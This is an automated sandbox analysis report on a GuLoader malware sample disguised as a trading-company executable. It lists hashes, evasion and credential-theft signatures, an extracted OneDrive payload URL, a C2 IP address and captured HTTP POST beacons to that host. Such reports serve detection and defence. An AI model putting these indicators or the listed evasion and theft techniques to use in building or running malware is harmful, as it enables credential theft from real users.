Windows Analysis Report KHAWATMI CO.IMPORT & EXPORT.exe

Overview

General Information

Sample Name: KHAWATMI CO.IMPORT & EXPORT.exe
Analysis ID: 458277
MD5: 0153ae8cf4b1f546721332b5cb3f973c
SHA1: 479858ef740172cb3791527a9c9d0da76eec3af4
SHA256: 97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
Tags: exe
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}
Multi AV Scanner detection for submitted file
Source: KHAWATMI CO.IMPORT & EXPORT.exe ReversingLabs: Detection: 13%

Compliance:

barindex
Uses 32bit PE files
Source: KHAWATMI CO.IMPORT & EXPORT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://onedrive.live.com/download?cid=7B0580AA0B18AE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.227.139.18 185.227.139.18
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 163Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: unknown HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Aug 2021 06:12:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzg

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_004028B8 GetAsyncKeyState, 1_2_004028B8

System Summary:

barindex
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B NtWriteVirtualMemory, 1_2_03D1611B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A932 NtWriteVirtualMemory,LoadLibraryA,NtProtectVirtualMemory, 1_2_03D1A932
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D166C6 NtAllocateVirtualMemory, 1_2_03D166C6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D151C1 NtWriteVirtualMemory, 1_2_03D151C1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D145CD NtWriteVirtualMemory, 1_2_03D145CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14DF2 NtWriteVirtualMemory, 1_2_03D14DF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16BFE NtWriteVirtualMemory, 1_2_03D16BFE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D153E5 NtWriteVirtualMemory, 1_2_03D153E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10BEC NtWriteVirtualMemory, 1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16795 NtAllocateVirtualMemory, 1_2_03D16795
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D NtWriteVirtualMemory, 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D157AF NtWriteVirtualMemory, 1_2_03D157AF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14F79 NtWriteVirtualMemory, 1_2_03D14F79
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15B65 NtWriteVirtualMemory, 1_2_03D15B65
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1556D NtWriteVirtualMemory, 1_2_03D1556D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15B03 NtWriteVirtualMemory, 1_2_03D15B03
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14CD1 NtWriteVirtualMemory, 1_2_03D14CD1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D152C9 NtWriteVirtualMemory, 1_2_03D152C9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D158CD NtWriteVirtualMemory, 1_2_03D158CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B4F9 NtWriteVirtualMemory, 1_2_03D1B4F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D126E7 NtWriteVirtualMemory, 1_2_03D126E7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15681 NtWriteVirtualMemory, 1_2_03D15681
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15072 NtWriteVirtualMemory, 1_2_03D15072
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1547B NtWriteVirtualMemory, 1_2_03D1547B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D NtWriteVirtualMemory, 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15A25 NtWriteVirtualMemory, 1_2_03D15A25
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B6B4 LdrInitializeThunk,NtProtectVirtualMemory, 24_2_0056B6B4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B7E6 Sleep,NtProtectVirtualMemory, 24_2_0056B7E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B811 NtProtectVirtualMemory, 24_2_0056B811
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B727 NtProtectVirtualMemory, 24_2_0056B727
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B6AD LdrInitializeThunk,NtProtectVirtualMemory, 24_2_0056B6AD
Detected potential crypto function
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1ADC1 1_2_03D1ADC1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B3EA 1_2_03D1B3EA
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B 1_2_03D1611B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A932 1_2_03D1A932
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F36 1_2_03D10F36
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D166C6 1_2_03D166C6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10680 1_2_03D10680
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D107D1 1_2_03D107D1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FD4 1_2_03D19FD4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D151C1 1_2_03D151C1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D145CD 1_2_03D145CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1ADCD 1_2_03D1ADCD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B1CF 1_2_03D1B1CF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FCE 1_2_03D19FCE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14DF2 1_2_03D14DF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FF2 1_2_03D19FF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D111F5 1_2_03D111F5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D123F9 1_2_03D123F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D135F9 1_2_03D135F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16BFE 1_2_03D16BFE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D153E5 1_2_03D153E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D163E6 1_2_03D163E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10BEC 1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FEC 1_2_03D19FEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A18A 1_2_03D1A18A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D145B3 1_2_03D145B3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D197B7 1_2_03D197B7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D117A1 1_2_03D117A1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AFA5 1_2_03D1AFA5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D157AF 1_2_03D157AF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D149AE 1_2_03D149AE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F51 1_2_03D10F51
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D13951 1_2_03D13951
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1415D 1_2_03D1415D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11546 1_2_03D11546
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1374E 1_2_03D1374E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F77 1_2_03D10F77
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14F79 1_2_03D14F79
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1317D 1_2_03D1317D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18F7D 1_2_03D18F7D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D12F7E 1_2_03D12F7E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10361 1_2_03D10361
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1556D 1_2_03D1556D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1131A 1_2_03D1131A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1311C 1_2_03D1311C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D12B1E 1_2_03D12B1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15B03 1_2_03D15B03
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11107 1_2_03D11107
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D39 1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19F3A 1_2_03D19F3A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16D27 1_2_03D16D27
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19529 1_2_03D19529
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AF29 1_2_03D1AF29
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1972D 1_2_03D1972D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14CD1 1_2_03D14CD1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D134D3 1_2_03D134D3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D140DC 1_2_03D140DC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D152C9 1_2_03D152C9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D158CD 1_2_03D158CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B4F9 1_2_03D1B4F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11EE2 1_2_03D11EE2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D108E5 1_2_03D108E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D126E7 1_2_03D126E7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D194E6 1_2_03D194E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B091 1_2_03D1B091
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15681 1_2_03D15681
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B6B4 1_2_03D1B6B4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AEBB 1_2_03D1AEBB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AE57 1_2_03D1AE57
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1964D 1_2_03D1964D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15072 1_2_03D15072
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19E75 1_2_03D19E75
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1547B 1_2_03D1547B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11665 1_2_03D11665
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1141F 1_2_03D1141F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16C1E 1_2_03D16C1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B036 1_2_03D1B036
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18C3C 1_2_03D18C3C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1303F 1_2_03D1303F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15A25 1_2_03D15A25
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D13827 1_2_03D13827
Sample file is different than original file name gathered from version info
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.603288987.00000000021F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000000.601895516.0000000000424000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029860319.000000001DEC0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029835895.000000001DD70000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
Uses 32bit PE files
Source: KHAWATMI CO.IMPORT & EXPORT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
